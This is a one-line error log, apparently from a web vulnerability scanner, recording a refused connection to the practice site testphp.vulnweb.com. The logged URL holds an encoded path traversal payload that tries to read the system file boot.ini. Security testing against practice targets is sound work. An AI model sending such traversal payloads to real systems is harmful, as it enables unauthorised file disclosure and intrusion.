2024-07-15 17:32:07,294:ERROR:Error with URL http://testphp.vulnweb.com/listproducts.php?cat=..%25c1%259c..%25c1%259c..%25c1%259cboot.ini: HTTPConnectionPool(host='testphp.vulnweb.com', port=80): Max retries exceeded with url: /listproducts.php?cat=..%25c1%259c..%25c1%259c..%25c1%259cboot.ini (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x747cff09d0>: Failed to establish a new connection: [Errno 111] Connection refused'))
